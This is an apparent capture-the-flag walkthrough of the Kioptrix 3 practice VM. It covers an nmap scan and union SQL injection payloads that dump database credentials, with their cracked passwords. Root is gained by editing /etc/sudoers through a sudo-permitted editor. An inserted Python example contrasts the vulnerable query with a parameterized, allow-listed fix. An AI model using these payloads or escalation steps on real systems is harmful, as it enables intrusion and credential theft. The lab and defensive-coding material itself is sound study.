Scan the host

nmap 192.168.1.131 -A -oA nmap-results/attack
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30e3f6dc2e225d17ac460239ad71cb49 (DSA)
|_ 2048 9a82e696e47ed6a6d74544cb19aaecdd (RSA)

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-title: Ligoat Security - Got Goat? Security ...
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch

Visit port 80

The id parameter is vulnerable to union-based SQL injection

# Table names
?id=1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--+&sort=photoid#photos

# Column names
?id=1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='dev_accounts'--+&sort=photoid#photos

# Data
?id=1 union select 1,group_concat(username,0x7e,password),3,4,5,6 from gallery.dev_accounts--+&sort=photoid#photos
# MD5 cracking: each hash is followed by its recovered plaintext
dreg/0d3eccfb887aabd50f243b3f155c0f85
dreg/Mast3r
loneferret/5badcaf789d3d1d09794d8f021f40f0e
loneferret/starwars
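The injection above works because the photo gallery pastes the `id` and `sort` parameters straight into its SQL text. The following is an added example, not code from the Kioptrix image or from this writeup: it rebuilds the pattern against an in-memory SQLite database and sets the vulnerable query beside a hardened one. The `dev_accounts` table, its `username`/`password` columns and the two hashes come from the page; the photo table's six columns (matching the payload's column count), its rows and the sortable-column allow-list are assumptions, and the page's MySQL payload is rewritten for SQLite (`||` instead of `group_concat`/`0x7e`, no schema prefix).

```python
import sqlite3

# Constructed stand-in for the gallery database the page dumps. dev_accounts
# and the two hashes are from the page; the gallery table (six columns, to
# match the union payload) and its rows are assumptions.
SCHEMA = """
CREATE TABLE gallery (photoid INTEGER, title TEXT, filename TEXT,
                      votes INTEGER, owner TEXT, posted TEXT);
CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
INSERT INTO gallery VALUES (1, 'goat', 'goat.jpg', 3, 'admin', '2011-01-01');
INSERT INTO gallery VALUES (2, 'fence', 'fence.jpg', 1, 'admin', '2011-01-02');
INSERT INTO dev_accounts VALUES (1, 'dreg', '0d3eccfb887aabd50f243b3f155c0f85');
INSERT INTO dev_accounts VALUES (2, 'loneferret', '5badcaf789d3d1d09794d8f021f40f0e');
"""

# The page's data-dump payload, adapted to SQLite syntax. After URL decoding
# the trailing "--+" is "-- ", a comment that swallows the rest of the query.
PAYLOAD_ID = "1 union select 1,username||'~'||password,3,4,5,6 from dev_accounts-- "

COLUMNS = "photoid, title, filename, votes, owner, posted"
ALLOWED_SORT = {"photoid", "title", "votes"}   # assumption: the sortable columns


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def photos_vulnerable(conn, photo_id, sort):
    """The pattern behind the page's injection: both URL parameters are pasted
    into the SQL text, so `id` can append a UNION and `sort` anything at all."""
    sql = f"SELECT {COLUMNS} FROM gallery WHERE photoid={photo_id} ORDER BY {sort}"
    return conn.execute(sql).fetchall()


def photos_hardened(conn, photo_id, sort):
    """The value travels as a bound parameter; the ORDER BY column, which
    cannot be bound, is checked against an allow-list of real column names."""
    if sort not in ALLOWED_SORT:
        raise ValueError(f"unsupported sort column: {sort!r}")
    try:
        pid = int(photo_id)              # anything but a plain integer is rejected
    except (TypeError, ValueError):
        raise ValueError(f"photo id must be an integer: {photo_id!r}")
    sql = f"SELECT {COLUMNS} FROM gallery WHERE photoid=? ORDER BY {sort}"
    return conn.execute(sql, (pid,)).fetchall()


def rejects(fn, *args):
    """True if fn(*args) raises ValueError, i.e. the hardened path refused the input."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable query, injected id:", photos_vulnerable(conn, PAYLOAD_ID, "photoid"))
    print("hardened query rejects the same id:", rejects(photos_hardened, conn, PAYLOAD_ID, "photoid"))
    print("hardened query, legitimate request:", photos_hardened(conn, "1", "photoid"))
```

Running it shows the vulnerable query returning the photo row plus one row per `dev_accounts` entry, while the hardened query refuses the injected id before it reaches the database. Binding alone would also defeat the UNION, but the integer check fails loudly instead of silently returning nothing, and the allow-list is what protects `sort`, since identifiers cannot be bound.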

Since SSH is open, try logging in with these two accounts.

Privilege escalation

List the SUID binaries

find / -perm -u=s -type f 2>/dev/null

Log in as the other account

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht

ht can be run as root without a password.

# Set the terminal type first, otherwise ht will not start
export TERM=xterm-color

Edit the /etc/sudoers file (through ht, which runs as root)

Add /bin/bash to the allowed commands

# Escalate
sudo bash